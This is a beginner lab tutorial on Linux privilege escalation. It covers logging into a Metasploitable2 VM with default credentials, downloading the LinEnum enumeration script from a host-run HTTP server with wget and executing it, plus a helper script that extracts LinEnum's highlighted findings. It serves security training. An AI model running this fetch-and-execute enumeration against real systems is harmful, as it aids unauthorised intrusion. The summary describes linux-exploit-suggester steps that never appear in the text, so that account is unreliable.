Linux Privilege Escalation With Automation Tools

Beginner

Introduction

In this lab, we will explore two of the most commonly used Linux privilege escalation automation tools: LinEnum and linux-exploit-suggester. The goal is to learn how to use these tools effectively to speed up the privilege escalation phase of a penetration test or security assessment. Mastering them saves considerable time and effort, allowing you to focus on understanding the underlying principles and methodologies of privilege escalation.

Setting up the Environment

In this step, we will set up the Metasploitable2 virtual machine, which will serve as our target system. Follow the instructions below to start the virtual machine and establish a connection:

In our lab environment, the Metasploitable2 virtual machine has been pre-configured. You can start the virtual machine and connect to it using the following steps:

  1. Open a terminal and run the following command to start the Metasploitable2 virtual machine:

    sudo virsh start Metasploitable2

  2. Wait for 1-2 minutes until the virtual machine is fully booted and ready.

  3. Verify that you can ping the Metasploitable2 IP address (192.168.122.102) from your host machine.

  4. Use the following command to connect to the Metasploitable2 virtual machine via SSH:

    ssh msfadmin@192.168.122.102

    At the first connection, you will be prompted to accept the authenticity of the host. Type yes and press Enter to continue.

    Then enter the msfadmin password when prompted:

    msfadmin

After successful authentication, you should have a low-privileged shell session on the Metasploitable2 virtual machine.

LinEnum: Automating Linux System Enumeration

LinEnum is a powerful script that automates the enumeration process on a Linux system, gathering valuable information that can aid in the privilege escalation process. Follow the steps below to use LinEnum on the Metasploitable2 virtual machine:

  1. On your host machine, open a terminal and navigate to the /tmp directory:

    cd /tmp

    The lab environment provides the LinEnum.sh script in this /tmp directory.

  2. Start a Python HTTP server in the /tmp directory to host the LinEnum script:

    python3 -m http.server 8000

  3. On the Metasploitable2 VM, navigate to the /tmp directory and download the LinEnum script using wget from the Python HTTP server running on your host machine:

    cd /tmp
    wget 192.168.122.1:8000/LinEnum.sh -P /tmp

  4. Make the LinEnum script executable:

    chmod +x LinEnum.sh

  5. Execute the LinEnum script and redirect the output to a file for further analysis. The ./ prefix is required because /tmp is not in the shell's PATH:

    ./LinEnum.sh > linenum_output.txt

LinEnum will perform various checks and enumerate system information, highlighting potential vulnerabilities or misconfigurations in yellow text. Pay close attention to these highlighted areas, as they may reveal opportunities for privilege escalation.
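
Because step 5 redirects the output to a file, the yellow highlighting is saved as escape sequences rather than displayed. The script below is an added example, not part of the original lab or of LinEnum; it assumes the colour is stored as ANSI SGR sequences with code 33 for yellow, and its function names and sample input are constructed for illustration.

```shell
#!/bin/sh
# Added example: list what LinEnum marked in yellow in a saved output file.
# Assumption: colour is stored as ANSI SGR sequences (ESC[...m), 33 = yellow.
ESC=$(printf '\033')

# Print each yellow headline plus the uncoloured detail lines under it, with
# escape sequences stripped. A block ends at a blank line or at the next line
# highlighted in a different colour.
linenum_highlights() {
    awk -v esc="$ESC" '
        BEGIN {
            yellow = esc "\\[([0-9]+;)*33m"   # ESC[33m, ESC[00;33m, ...
            sgr    = esc "\\[[0-9;]*m"        # any colour or reset sequence
        }
        {
            line = $0
            if (line ~ yellow)   { inblock = 1 }
            else if (line ~ sgr) { inblock = 0 }
            gsub(sgr, "", line)
            if (line ~ /^[ \t]*$/) { inblock = 0 }
            if (inblock) print line
        }' "$1"
}

# Number of yellow-highlighted lines in the file.
linenum_highlight_count() {
    grep -c -E "${ESC}\\[([0-9]+;)*33m" "$1" || true
}

# Constructed sample input (not real LinEnum output).
make_sample() {
    printf '\033[00;31m[-] Constructed info A:\033[00m\nplain data\n\n'
    printf '\033[00;33m[+] Constructed finding B\033[00m\ndetail 1\ndetail 2\n\n'
    printf '\033[00;33m### CONSTRUCTED BANNER ###\033[00m\n'
    printf '\033[00;31m[-] Constructed info C:\033[00m\nmore plain data\n'
}

sample=$(mktemp)
make_sample > "$sample"
linenum_highlights "$sample"
echo "highlighted lines: $(linenum_highlight_count "$sample")"
rm -f "$sample"
```

To apply it to the lab output, call linenum_highlights linenum_output.txt. For manual reading, less -R linenum_output.txt renders the saved colours in the terminal.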

Summary

In this lab, we learned how to use two powerful automation tools, LinEnum and linux-exploit-suggester, to assist in the privilege escalation process on Linux systems. LinEnum provides a comprehensive enumeration of system information, highlighting potential vulnerabilities and misconfigurations. The linux-exploit-suggester tool analyzes the kernel version and suggests relevant kernel exploits that could lead to privilege escalation.

By leveraging these tools, we can streamline the information-gathering and analysis phases, saving valuable time during a penetration test or security assessment. However, it's crucial to understand that these tools are meant to aid in the process, and a solid understanding of privilege escalation techniques and methodologies is still essential for successful exploitation.

Throughout this lab, we practiced setting up a vulnerable virtual machine environment, downloading and executing the LinEnum and linux-exploit-suggester scripts, and interpreting their outputs. The hands-on experience gained from this lab will be invaluable in real-world scenarios, where efficient and effective privilege escalation is a critical skill for ethical hackers and security professionals.
